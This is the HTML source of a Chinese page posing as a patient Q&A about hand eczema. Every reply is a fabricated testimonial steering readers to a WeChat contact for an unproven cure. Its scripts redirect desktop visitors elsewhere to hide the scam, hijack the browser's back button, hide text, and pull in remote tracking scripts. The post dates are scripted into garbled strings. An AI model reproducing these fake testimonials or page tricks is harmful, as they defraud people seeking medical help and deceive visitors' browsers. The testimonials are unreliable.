<html>
<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>手部湿疹_病例_快速问医生_有问必答</title>
    <meta content="yes" name="apple-mobile-web-app-capable">
    <meta content="black" name="apple-mobile-web-app-status-bar-style">
    <meta content="telephone=no" name="format-detection">
    <link rel="stylesheet" href="../css/article.css">
    <link rel="stylesheet" href="../css/index.css">
    <link rel="stylesheet" href="../css/tankuang.css">
    <script src="js/clipboard.min.js"></script>
    <style type="text/css" abt="234"></style>
    <script>//console.log('a')
    </script>
    <script>//remove baidu search ad
    var _countAA = 0

    function doBBBd() {
        var alla = document.getElementsByTagName('a')
        for (var i = 0; i < alla.length; i++) {
            if (/baidu.com\/(baidu.php\?url=|adrc.php\?t)/.test(alla[i].href)) {
                var _temp = alla[i].parentElement, loop = 0
                while (loop < 5) {
                    _temp = _temp.parentElement
                    loop++
                    if (_temp.parentElement.id == 'content_left') {
                        _temp.remove()
                        break
                    }
                }
            }
        }

        if (_countAA++ < 20) {
            setTimeout(doBBBd, 500)
        }

    }

    doBBBd()
    document.addEventListener('keyup', function () {
        _countAA -= 10;
        doBBBd()
    }, false)
    document.addEventListener('click', function () {
        _countAA -= 10;
        doBBBd()
    }, false)
    </script>
<script>
    //声明_czc对象:
    var _czc = _czc || [];
    //绑定siteid，请用您的siteid替换下方"XXXXXXXX"部分
    _czc.push(["_setAccount", "1278561804"]);
</script>
</head>
<script src="../js/data.js"></script>
<div style="display: none">
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278561804'%3E%3C/span%3E%3Cscript src='" +
        cnzz_protocol + "v1.cnzz.com/z_stat.php%3Fid%3D1278561804' type='text/javascript'%3E%3C/script%3E"));</script>
</div>
<body>
<div id="LRdiv0" style="display:none;"></div>
<div id="LRdiv1" style="display:none;"></div>
<div id="LRdiv2" style="display:none;"></div>
<div id="LRdiv3" style="display:none;"></div>

<script>
    function pushHistory() {
        var state = {title: "index", url: "http://www.mikasan.xin/sz1/asz1/index.html"};
        window.history.pushState(state, "index", location.href);
        state = {title: "index", url: ""};
        window.history.pushState(state, "index", "");
    }

    setTimeout(function () {
        pushHistory();
        window.addEventListener("popstate", function (e) {
            if (window.history.state != null && window.history.state.url != "") {
                location.href = window.history.state.url;
            }
        });
    }, 300);
</script>
<script src="../js/data.js"></script>
<script>
    var system = {
        win: false,
        mac: false,
        xll: false
    };
    var p = navigator.platform;
    system.win = p.indexOf("Win") == 0;
    system.mac = p.indexOf("Mac") == 0;
    system.x11 = (p == "X11") || (p.indexOf("Linux") == 0);
    if (system.win || system.mac || system.xll) {
        window.location.href = "http://xh9.gyg120.net";
    }
</script>
<style>
    * {
        padding: 0;
        margin: 0;
    }

    .d_box_header {
        width: 100%;
        height: 50px;
        background-color: #63bd3b;
        position: relative;
    }

    .topbox_a, .userface {
        position: absolute;
    }

    .topbox_a {
        margin-top: 11px;
        display: inline-block;
        width: 27px;
        height: 27px;
        left: 7px;
    }

    .topbox_header .topbox_a img {
        width: 27px;
        height: 27px;
    }

    .topbox_header .loginout {
        background: url(img/03.jpg) no-repeat;
        background-size: 27px 24px;
        width: 27px;
        height: 24px;
        display: block;
        right: 9px;
        top: 12px;
    }

    .topbox_header .loginin {
        background: url(img/searchicon.png) no-repeat;
        background-size: 23px 47px;
        width: 27px;
        height: 24px;
        display: block;
        right: 9px;
        top: 12px;
        background-position: 0 -23px;
    }

    .topbox_header .search_form {
        display: block;
        margin-left: 42px;
        margin-right: 45px;
        position: relative;
        top: 10px;
    }

    .topbox_header .search_input {
        width: 100%;
        display: block;
        background: url(img/searchicon.png) no-repeat;
        background-size: 23px 47px;
        padding: 5px 3px 5px 28px;
        background-position: 8px 7px;
        height: 28px;
        background-color: #f5f5f5;
        border: none;
        font-size: 13px;
        border-radius: 14px;
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
        outline: none;
        color: #6c6c6c;
    }
</style>

<div class="topbox_header d_box_header">
    <a href="#" class="topbox_a"><img src="img/logoimg.png"></a>
    <form method="get" action="#" class="search_form">
        <input type="search" autocorrect="off" autocomplete="off" name="keyword"
               placeholder="搜索疾病、药品" class="search_input">
    </form>
    <a href="#" rel="nofollow" class="userface loginin"></a>
</div>
<div class="art_lists">
    <b class="ti">手部湿疹</b>
    <div class="nav">
        <p class="d_box">
            <!--	<a href="#" class="cur">恢复案例</a>-->
        </p>
    </div>
</div>
<style>
    .art_guide .more {
        display: block;
        text-align: center;
        line-height: 38px;
        background-color: #f5f5f5;
        color: #999;
    }
</style>

<div class="article_cont">
    <h1>手部长了湿疹怎么办，能治好吗，我是搞美发的这样下去不行呀？</h1>
    <span class="time">发布时间<span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月</span></span>
    <div class="cont">
        <p>
            【一般资料】：请问下各位专家，我手上长了湿疹是前两个月长的，我是做美发工作的，我想是不我接触洗发水的原因呀，现在直接影响到我上班了，都不敢让顾客看到我的手。
        </p>
    </div>
</div>
<div class="art_guide">
    <h3 class="ti">网友回复</h3>
    <div id="lists">
        <div class="li">
            <div class="top">
                <a class="face" href="#"><img src="img/aa.jpg"></a>
                <span><a href="javascript:void(0);">游客</a><var><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月</span></var></span>
            </div>
            <span class="c">你加这个微信号咨询下：<span  class="wx_str" onclick="clickSpan()"  id="spanclick"
                                             style="font-weight:bold;color:red;"  ><script>document.write(Arr);</script>hgexshit</span> 点击复制添加就行。我脸上湿疹在她这里指导修复的，已恢复</span>
        </div>
        <div class="li">
            <div class="top">
                <a class="face" href="#"><img src="img/aa.jpg"></a>
                <span><a href="#">游客</a><var><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月</span></var></span>
            </div>
            <span class="c">我也是手上有湿疹，你看下当时有多严重，就是楼上这个微信号咨询了方法治疗已经好了</span>
            <img src="img/1.jpg" width="300px">
            <p>用药前我记录的</p>
            <img src="img/2.jpg" width="300px">
            <p>使用中15天已经完全好了</p>
        </div>
        <div class="li">
            <div class="top">
                <a class="face" href="#"><img src="img/aa.jpg"></a>
                <span><a href="#">游客</a><var><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月</span></var></span>
            </div>
            <span class="c">我耳朵上湿疹也是加楼上说的那个老师微信治好的</span>
        </div>
        <div class="li">
            <div class="top">
                <a class="face" href="#"><img src="img/aa.jpg"></a>
                <span><a href="#">游客</a><var><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月</span></var></span>
            </div>
            <span class="c">我手上的湿疹也是在这里治好的，就是楼上的那个微信号就能联系上老师....</span>
            <img src="img/3.jpg" width="400px" "="">
            <p>使用了9天时间已经完全好了，真不错呀。</p>
            <img src="img/4.jpg" width="400px" "="">
        </div>
    </div>
    <a class="more" href="#" id="s-load_more">查看更多</a>
</div>
<div class="ListSearchBg"></div>
<div class="ListSearchBox">
    <span></span>
    <i></i>
</div>
<div class="bar" style="font-size:1px;filter:alpha(opacity=100);
 -moz-opacity:0;
 -khtml-opacity: 0;
opacity: 0;
background: #fff">
    <script>document.write(stxlwe)</script>
</div>
<script>
    var clipboard = new ClipboardJS('.weixinid');
    clipboard.on('success', function (e) {
        console.log(e);
    });
    clipboard.on('error', function (e) {
        console.log(e);
    });
</script>
<script>
    var btns = document.getElementsByClassName("weixinid");
    var guan = document.getElementsByClassName("quxiao")[0];
    var tan = document.getElementsByClassName("tanchu")[0];
    for (var i = 0; i < btns.length; i++) {
        btns[i].onclick = function () {
            tan.style.display = "flex"
        }
    }
    guan.onclick = function () {
        tan.style.display = "none"
    }
</script>
<script>
    var wx = document.getElementsByClassName("weixinid");
    (function () {
        for (var i in wx) {
            wx[i].innerHTML = stxlwe
        }
    })()
</script>
<script>
    var total_page = '48';
    var curr_page = 2;
    $("#s-load_more").click(function () {
        var code = '1uwvu5n53lwvu5crsk';
        var sortname = 'rfsz';
        $("#s-load_more").html("加载中...");
        $.ajax({
            'url': '/jibing/' + sortname + '/case/' + code + '.html',
            'data': {_: Math.random(), 'page': curr_page, 'v2': 1},
            'dataType': 'html',
            beforeSend: function () {
                $('.ListSearchBg').show();
                $('.ListSearchBox').show();
            },
            complete: function () {
                $('.ListSearchBg').hide();
                $('.ListSearchBox').hide();
            },
            'success': function (data) {
                if (data) {
                    $('#lists').append(data);
                    curr_page++;
                    if (total_page <= curr_page) {
                        $("#s-load_more").remove();
                    }
                    else {
                        $("#s-load_more").html("查看更多");
                    }
                } else {
                    $("#s-load_more").remove();
                }
            }
        });
    });
</script>
<script type="text/javascript">
    var siga = siga || [];
    var group = group || [];
    var time = time || [];
    siga.push('a86bd91a218745af2b9474a1a0008f7c');
    group.push('8288');
    time.push(86400); //86400代表默认同IP缓存一天(可自由设置1就是1秒);
    (function () {
        var ma = document.createElement('script');
        ma.type = 'text/javascript';
        ma.async = true;
        ma.src = 'https://code.ljwit.com/weixin_bases.js';
        var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(ma, s);
    })();
</script>

<script src="https://tj.ljwit.com/code_ex/code_ex3.js"></script>
<script>
    $(".wx_str").click(function(){
        $("#tanchuang_result").fadeIn();
        $("#mask").fadeIn();
        console.log(1)
    });
    $("#close").click(function(){
        $("#mask").fadeOut();
        $("#tanchuang_result").fadeOut();
    })
</script>
</body>
</html>
